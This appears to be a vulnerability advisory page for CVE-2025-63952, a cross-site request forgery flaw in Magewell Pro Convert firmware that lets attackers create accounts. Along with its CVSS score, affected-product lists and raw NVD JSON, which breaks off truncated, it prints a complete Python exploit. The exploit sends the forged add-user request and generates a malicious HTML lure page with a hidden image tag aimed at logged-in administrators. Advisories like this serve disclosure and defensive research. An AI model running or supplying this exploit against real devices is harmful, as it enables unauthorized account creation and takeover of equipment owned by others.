CVE-2025-63952

Description

A Cross-Site Request Forgery (CSRF) in the /mwapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:magewell:pro_convert_hdmi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:magewell:pro_convert_hdmi_4k_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:magewell:pro_convert_hdmi_plus_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:magewell:pro_convert_hdmi_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:magewell:pro_convert_hdmi_tx_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:magewell:pro_convert_hdmi_tx:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:magewell:pro_convert_12g_sdi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:magewell:pro_convert_12g_sdi_4k_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:magewell:pro_convert_sdi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:magewell:pro_convert_sdi_4k_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE

Magewell Pro Convert v1.2.213

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import argparse

def exploit_csrf(target_url, username, password):
    """
    CVE-2025-63952 PoC - Magewell Pro Convert CSRF Account Creation
    
    Description: This PoC demonstrates the CSRF vulnerability in Magewell Pro Convert
    where /mwapi?method=add-user lacks proper CSRF token validation.
    
    Usage: python exploit.py -t http://target.com -u newuser -p newpass
    """
    # Construct the malicious CSRF payload
    # The attacker controls username and password via GET parameters
    params = {
        'method': 'add-user',
        'username': username,
        'password': password
    }
    
    # Target endpoint
    endpoint = f"{target_url}/mwapi"
    
    print(f"[*] Targeting: {endpoint}")
    print(f"[*] Attempting to create user: {username}")
    
    try:
        # Send the crafted GET request (CSRF attack)
        response = requests.get(endpoint, params=params, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:200]}")
        
        if response.status_code == 200:
            print("[+] Request sent successfully - CSRF vulnerability may be present")
        else:
            print("[-] Request failed")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

def generate_malicious_html(target_url, username, password):
    """
    Generate malicious HTML page for CSRF attack
    This would be hosted by attacker and trick logged-in admin to visit
    """
    html = f'''
    <html>
    <body>
    <h1>Click to continue</h1>
    <img src="{target_url}/mwapi?method=add-user&username={username}&password={password}" width="1" height="1">
    </body>
    </html>
    '''
    with open('csrf_exploit.html', 'w') as f:
        f.write(html)
    print("[+] Malicious HTML saved as csrf_exploit.html")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-63952 CSRF Exploit')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-u', '--username', required=True, help='Username to create')
    parser.add_argument('-p', '--password', required=True, help='Password for new user')
    args = parser.parse_args()
    
    exploit_csrf(args.target, args.username, args.password)
    generate_malicious_html(args.target, args.username, args.password)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63952
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63952
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63952/
[4] VulDB https://vuldb.com/cve/CVE-2025-63952
[5] https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-63952
[6] https://www.magewell.com

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63952", "sourceIdentifier": "[email protected]", "published": "2025-11-24T17:16:08.517", "lastModified": "2025-12-30T18:13:43.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Request Forgery (CSRF) in the /mwapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_hdmi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "F79FF420-5C76-4415-A328-14F36A3F0580"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_hdmi_4k_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "ADB1A789-DE46-4A78-847E-B057F1C19BFC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_hdmi_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "0A482F2C-BA10-486C-B269-C54B7E40A812"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_hdmi_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F28BCEE-DFCA-4DA3-B230-159FF9B2E322"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_hdmi_tx_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "AF735287-5754-463D-93DF-2CB50471369E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_hdmi_tx:-:*:*:*:*:*:*:*", "matchCriteriaId": "B3D4371C-A483-4CBD-97F6-7D2A39D6D5E6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_12g_sdi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "F8942E00-D02E-4C6C-BB26-3023D465DDB2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_12g_sdi_4k_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "4E95CD31-4ADF-4C08-B19C-6B7117518DB0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_sdi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "C1CA819A-C9B9-4669-9EC6-73FC73C6EAAC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_sdi_4k_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "D7133B02-9693-45A4-89ED-C50D8F35109A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_sdi_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "7FB96455-7250-4B55-A0B8-1D58E9272DB6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_sdi_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "2732B092-46DA-4B25-88BA-7B477C2AE68E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_sdi_tx_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "75D0133C-74C7-49DA-AE0F-15340CADA7EB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_sdi_tx:-:*:*:*:*:*:*:*", "matchCriteriaId": "732B335F-7445-4DA0-9166-25EC0E5DF4D4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_for_ndi_to_hdmi_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "6BB7B1AD-2166-45BA-8B58-98F0505E0BB2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_for_ndi_to_hdmi:-:*:*:*:*:*:*:*", "matchCriteriaId": "1F6715AC-5191-44DF-BE9C-B043187B4769"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_for_ndi_to_hdmi_4k_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "C1E88CDE-7 ... (truncated)